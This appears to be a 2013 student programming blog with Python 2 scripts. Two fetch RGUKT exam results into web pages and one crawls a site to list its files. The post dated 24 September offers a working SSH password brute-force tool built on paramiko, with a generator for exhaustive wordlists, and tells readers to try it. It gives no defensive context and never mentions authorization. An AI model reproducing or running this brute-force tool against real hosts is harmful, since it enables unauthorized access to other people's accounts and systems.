Thursday 3 October 2013

This is the program to view all your friends' results in a single web page.

If you have any queries, please send me a mail.

https://docs.google.com/file/d/0BwiFqJd9-GiARFl0QzR3enJPVm8/edit?usp=sharing
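
In case the linked file moves, here is a minimal sketch of the idea, assuming a results page that takes the student ID as a query parameter (the URL and parameter name below are placeholders, not the real RGUKT endpoint): fetch each friend's result page and stitch the responses into one HTML file.

import urllib2

# Placeholder results endpoint -- substitute the real RGUKT results URL.
RESULTS_URL = "http://example.com/results?id=%s"
FRIEND_IDS = ["N091234", "N095678"]  # your friends' ID numbers

pages = []
for student_id in FRIEND_IDS:
    try:
        # Fetch the result page for one student ID.
        pages.append(urllib2.urlopen(RESULTS_URL % student_id).read())
    except urllib2.URLError, err:
        print "Could not fetch result for", student_id, ":", err

# Write all the fetched results into a single web page.
out = open("all_results.html", "w")
out.write("<html><body>" + "<hr>".join(pages) + "</body></html>")
out.close()

Open all_results.html in a browser to see every result on one page.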

Sunday 29 September 2013

A small Python program to view the RGUKT results.



https://docs.google.com/file/d/0BwiFqJd9-GiAQlpqY280UnExYzQ/edit?usp=sharing


If you have any doubts, mail me at bharath.504143@gmail.com.
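
For a single ID, the core of such a program is just one HTTP request. A rough sketch, again with a placeholder results URL rather than the real one:

import urllib2

# Placeholder endpoint -- the real results URL takes the ID as a parameter.
RESULTS_URL = "http://example.com/results?id=%s"
student_id = raw_input("Enter your ID number: ")

try:
    # Fetch and print the raw result page for this ID.
    print urllib2.urlopen(RESULTS_URL % student_id).read()
except urllib2.URLError, err:
    print "Could not fetch the result:", err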

Tuesday 24 September 2013

This is a small program to brute-force the SSH login of a host with an open SSH port. Check it out and try it on your Unix or Windows operating system.


#!/usr/bin/python
import socket
import paramiko

IPADDRESS = "127.0.0.1"
USERNAME = "username"
SSHPORT = 22

# Read the candidate passwords, one per line.
password_file = open("passwords.txt", "r")
passwords = password_file.read().split("\n")
password_file.close()

try:
    for passwd in passwords:
        ssh = paramiko.SSHClient()
        ssh.load_system_host_keys()
        ssh.set_missing_host_key_policy(paramiko.MissingHostKeyPolicy())
        try:
            ssh.connect(IPADDRESS, port=SSHPORT, username=USERNAME, password=passwd)
            print "Connected successfully. Password = " + passwd
            break
        except paramiko.AuthenticationException:
            print "Incorrect password: " + passwd
        except socket.error, error:
            print error
        except paramiko.SSHException, error:
            print error
            print "Most probably this is caused by a missing host key"
        except Exception, error:
            print "Unknown error: " + str(error)
        finally:
            # Close the client before trying the next password.
            ssh.close()
except Exception, error:
    print error
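
The script expects a passwords.txt wordlist, one candidate per line. The original's unused itertools and string imports (and its PASSSIZE constant) hint at generating that list instead of supplying one; a sketch of that idea, which writes every lowercase password of a fixed length (the search space grows as 26**n, so keep the length small):

import itertools
import string

PASSSIZE = 3  # 26**3 = 17576 candidates; length 5 would already be ~11.8 million

# Write every lowercase combination of length PASSSIZE, one per line.
wordlist = open("passwords.txt", "w")
for combo in itertools.product(string.ascii_lowercase, repeat=PASSSIZE):
    wordlist.write("".join(combo) + "\n")
wordlist.close()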
This is a small program to find all documents and files in a website using Python.

# A small program to find all documents in a website using Python.
# Extending this program yields many more results; try it out.

import urllib2
from urlparse import urlparse
from posixpath import dirname

# Queue of "url,referrer_directory" strings discovered so far.
url_queue = []

# The base website URL to crawl:
base_url = "http://localhost/python_docs/"

# Proxy handling: uncomment the block below to route requests through a proxy.
#opener = urllib2.build_opener(
#                urllib2.HTTPHandler(),
#                urllib2.HTTPSHandler(),
#                urllib2.ProxyHandler({'http': 'http://127.0.0.1:1233'}))
#urllib2.install_opener(opener)

class website_analyzer:
    def __init__(self, website):
        self.website = website
        # Seed the queue; each entry is "url,referrer_directory".
        url_queue.append(self.website + ",")
        print "The given website is being analyzed by the web robot:", self.website
        # url_queue grows while we iterate, so newly found links are crawled too.
        for url in url_queue:
            selected_url(url)
        print url_queue

class selected_url:
    def __init__(self, link):
        # Each queue entry is "url,referrer_directory".
        self.link = link.split(",")[0]
        url_ref = link.split(",")[1]
        self.ret_data(self.link, url_ref)

    def ret_data(self, link, url_ref):
        self.url_ref = url_ref
        try:
            page_data = urllib2.urlopen(self.link).read()
            # Crude HTML parsing: split the page on href= attributes.
            href_split = page_data.split("href=")
            for single_link in href_split:
                try:
                    single_url = single_link.split("\"")[1]
                    url_split = urlparse(single_url)
                    if url_split.netloc == "":
                        # Relative link: resolve it against the base URL.
                        append_url = base_url + url_split.geturl() + "," + dirname(url_split.path)
                    else:
                        # Absolute link: keep it as given.
                        append_url = url_split.geturl() + "," + dirname(url_split.path)
                    if (append_url not in url_queue) and '#' not in append_url:
                        print append_url
                        url_queue.append(append_url)
                except IndexError:
                    # Fragment without a quoted href; skip it.
                    pass
        except ValueError, err:
            print "Error link", self.link, "error is", err
        except urllib2.URLError:
            print "URL not fetched:", self.link


if __name__=="__main__":
    website_analyzer("http://localhost/python_docs")
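
The crawler above queues every link it sees. Since the goal is finding documents, a natural follow-up is to filter the finished queue by file extension; the extension list here is my own choice:

# Run after the crawl: keep only links that look like documents.
DOC_EXTENSIONS = (".pdf", ".doc", ".ppt", ".txt", ".zip")

for entry in url_queue:
    url = entry.split(",")[0]
    if url.lower().endswith(DOC_EXTENSIONS):
        print "Document found:", url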